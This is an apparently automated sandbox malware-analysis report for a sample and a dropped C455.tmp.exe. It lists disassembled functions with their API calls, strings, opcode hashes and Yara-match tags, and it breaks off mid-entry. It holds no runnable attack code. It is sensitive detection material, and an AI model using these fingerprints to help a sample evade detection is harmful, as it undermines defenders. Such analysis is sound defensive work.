Function 00412685 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

SetThreadPriority.KERNEL32(?,?), ref: 00412691
GetLastError.KERNEL32 ref: 0041269D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126B3
__CxxThrowException@8.LIBVCRUNTIME ref: 004126C1

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
String ID:
API String ID: 4286982218-0
Opcode ID: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction ID: eb1a6d40bee4d863ba02ef3eb8c9f1a5d1f26ddbf15ae4e912fb13e181a4c061
Opcode Fuzzy Hash: 2e8a5abc4ba5302a065f6319043aedef3fe0da521bb0a121bd2973cc84f30b77
Instruction Fuzzy Hash: 3CE04F34600119ABCB14BF619E06BAF376C7A00745B50052AB515D10A2EE79D564869C

Function 0041274B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,00000000,00417971,00000000,?,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412757
GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412763
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412779
__CxxThrowException@8.LIBVCRUNTIME ref: 00412787

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
String ID:
API String ID: 1964976909-0
Opcode ID: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction ID: 63a90eab5ccd82633b541feab557f5b3d99097aee930e3f4eaa44923ec20be65
Opcode Fuzzy Hash: e92b9239321077a6426b58042713b272637ac11e22ba0cdbfa846f2b38cfd992
Instruction Fuzzy Hash: 43E04F34600119AADB10BF619E0AAAF37A87A00A45B50052AB915D10A2EE79D564869C

Function 02492959 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,02490DA0), ref: 0249295F
GetLastError.KERNEL32 ref: 0249296C
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02492982
__CxxThrowException@8.LIBVCRUNTIME ref: 02492990

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 39b89da5196754ac7e66ba7afbf2fb2fdc32eb80da0eee6845f7c8a3fde144f0
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 62E0C2305001057B8B14FBB99C48A7B36AC6A01B15B600B2BF861E20E0EBA8D1084AA8

Function 004126F2 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsAlloc.KERNEL32(?,00410B39), ref: 004126F8
GetLastError.KERNEL32 ref: 00412705
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041271B
__CxxThrowException@8.LIBVCRUNTIME ref: 00412729

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
String ID:
API String ID: 3103352999-0
Opcode ID: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C

Function 024920FF Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::critical_section::unlock.LIBCMT ref: 02492103

Part of subcall function 02491379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0249139A
Part of subcall function 02491379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 024913D1
Part of subcall function 02491379: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024913DD

Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0249210F

Part of subcall function 02490CEA: Concurrency::critical_section::unlock.LIBCMT ref: 02490D0E

Concurrency::Context::Block.LIBCONCRT ref: 02492114

Part of subcall function 02492EC8: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02492ECA

Concurrency::critical_section::lock.LIBCONCRT ref: 02492134

Part of subcall function 024912A2: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024912B0
Part of subcall function 024912A2: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024912BD
Part of subcall function 024912A2: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024912C8

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
String ID:
API String ID: 3659872527-0
Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction ID: 973d6d2bc67f311d57f88afb361013f4fa19c512d9d9c37a7d4e5a4d430c6c5d
Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction Fuzzy Hash: 8EE04F35500506ABCF09FB62C56459CBF62BF85310B54434FD86A572E0CF746E4ACF94

Function 00411E98 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::critical_section::unlock.LIBCMT ref: 00411E9C

Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411133
Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041116A
Part of subcall function 00411112: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411176

Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EA8

Part of subcall function 00410A83: Concurrency::critical_section::unlock.LIBCMT ref: 00410AA7

Concurrency::Context::Block.LIBCONCRT ref: 00411EAD

Part of subcall function 00412C61: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C63

Concurrency::critical_section::lock.LIBCONCRT ref: 00411ECD

Part of subcall function 0041103B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411049
Part of subcall function 0041103B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411056
Part of subcall function 0041103B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411061

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
String ID:
API String ID: 3659872527-0
Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction ID: 9d2f70e3251d3db540e969485d70697033c14617760f295063863c07ed990fb6
Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
Instruction Fuzzy Hash: BCE0DF34500502ABCB08FB21C5A25ECFB61BF88354B50821FE462432E2CF785E87DB88

Function 0042F07D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0042F10D

Strings

pow, xrefs: 0042F0E5, 0042F102

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F

Function 024BB0D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024BB32B,?,00000050,?,?,?,?,?), ref: 024BB1AB

Strings

OCP, xrefs: 024BB124
ACP, xrefs: 024BB0EE

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: d82f5f31afa3fae170ceda9a83c7987e31ea26b755ebb3535ab00374713e52e8
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: DB217F62A10105A6EB378F658D01BE772AAEF44BDDF4A8526ED09D7304E732D941C7B0

Function 0043AE69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44

Strings

ACP, xrefs: 0043AE87
OCP, xrefs: 0043AEBD

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID:
String ID: ACP$OCP
API String ID: 0-711371036
Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E

Function 00401F0A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A

Strings

image/png, xrefs: 00401F58

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: EncodersGdipImage$Size
String ID: image/png
API String ID: 864223233-2966254431
Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58

Function 0040EF26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA

Strings

F(@, xrefs: 0040EF29

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorLast
String ID: F(@
API String ID: 1452528299-2698495834
Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9

Function 0040C510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 0040C554

Strings

ios_base::failbit set, xrefs: 0040C510
F(@, xrefs: 0040C547

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ___std_exception_destroy
String ID: F(@$ios_base::failbit set
API String ID: 4194217158-1828034088
Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC

Function 0041DA0B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA53
__CxxThrowException@8.LIBVCRUNTIME ref: 0041DA61

Strings

pContext, xrefs: 0041DA4B

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1687795959-2046700901
Opcode ID: 8b89fd2ebf5a6180650f95f800d5794784ed0f3246bc88bba9479147dd287627
Instruction ID: 9bb5f33597777ba4e98b1388dc571d1ac2d7347b1e1174399eb2bf06ad7e47b8
Opcode Fuzzy Hash: 8b89fd2ebf5a6180650f95f800d5794784ed0f3246bc88bba9479147dd287627
Instruction Fuzzy Hash: DDF05939B005155BCB04EB59DC45C6EF7A8AF85760310017BFD01E3342CBB8ED058698

Function 0044068A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00440691

Strings

MOC, xrefs: 004406B4
RCC, xrefs: 004406C3

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: H_prolog3_catch
String ID: MOC$RCC
API String ID: 3886170330-2084237596
Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE

Function 00404E07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C

Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE

std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50

Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0

Strings

F@, xrefs: 00404E48

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: F@
API String ID: 2118720939-885931407
Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89

Function 0042381B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E

Strings

~B, xrefs: 00423827
zB, xrefs: 00423821

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ContextInternal$BaseBase::~Concurrency::details::
String ID: zB$~B
API String ID: 3275300208-395995950
Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC

Function 004212BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
__CxxThrowException@8.LIBVCRUNTIME ref: 004212E9

Strings

pThreadProxy, xrefs: 004212D3

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pThreadProxy
API String ID: 1687795959-3651400591
Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC

Function 024AB0F1 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02482AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02482AAD,00000000), ref: 024AB187
GetLastError.KERNEL32 ref: 024AB195
MultiByteToWideChar.KERNEL32(?,00000001,?,?,02482AAD,00000000), ref: 024AB1F0

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction ID: bf93f079a537c6fe2134ac975e89092c4dfc72e2da7a6cff801ae4eda88185ba
Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
Instruction Fuzzy Hash: E9410732600246AFDB218F65CC687BF7BB5EF71758F14426BEC599B2A0DB308901CB60

Function 0042AE8A Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
GetLastError.KERNEL32 ref: 0042AF2E
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction ID: 9270b5025f3a17d6db836abfdfc26bc83889a51b194ae21b206bd0a56260f073
Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
Instruction Fuzzy Hash: 5F410770700222AFCB219F65EA44BABBBB4EF01311F56416BFC5597291DB3C8D11C75A

Analysis Process: C455.tmp.exePID: 7396, Parent PID: 7276COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	45.5%
Signature Coverage:	10.6%
Total number of Nodes:	66
Total number of Limit Nodes:	3

Executed Functions

Function 00408790 Relevance: 7.6, APIs: 5, Instructions: 146
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 004087B4
GetCurrentThreadId.KERNEL32 ref: 004087BE
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
GetForegroundWindow.USER32 ref: 00408870
ExitProcess.KERNEL32 ref: 00408972

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction ID: a67ee57a83d6170df5f07577f929ddf8a699819013d33d30bc43b1fbcecb0360
Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
Instruction Fuzzy Hash: 95417E77F443180BD31CBEB59C9A36AB2969BC4314F0A903F6985AB3D1DD7C5C0552C5

Function 0043A9B0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043CD60 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

ihgf, xrefs: 0043CD85

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ihgf
API String ID: 2994545307-2948842496
Opcode ID: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
Instruction ID: fada9a9e4b2345b6e6448840249a942183f34978708c931c01a97142677ee2ca
Opcode Fuzzy Hash: dc78d9af145ba0afec033d80e05627e4c530122498a0d20b58ff3d4b62c44d01
Instruction Fuzzy Hash: 4C31F434304300AFE7109B249CC2B7BBBA5EB8EB14F24653DF584A3391D265EC60874A

Function 0043B05B Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
Instruction ID: 59f44d745d542156a41113c6a864a29fdb0868418a705d17f35015423a5ff240
Opcode Fuzzy Hash: 4b87544a561184a7d4b1543d2ac67acc99fdb29ef1ee15d58e3a116105f186d8
Instruction Fuzzy Hash: 3F418C76A587588FC724AF54ACC477BB3A1EB8A320F2E552DDAE517351E7648C0083CD

Function 0040BDC9 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2221393489.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2221393489.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_C455.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
Instruction ID: 5bf83162093d809aa6a095f83f940cb60b386281fae2fad957a8694bd2eb5c71
Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
Instruction Fuzzy Hash: 3911E071608341ABD7149F29DD9067FBBE2EBC2354F14AE2CE59253790C630C841CB4A

Function 009F003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

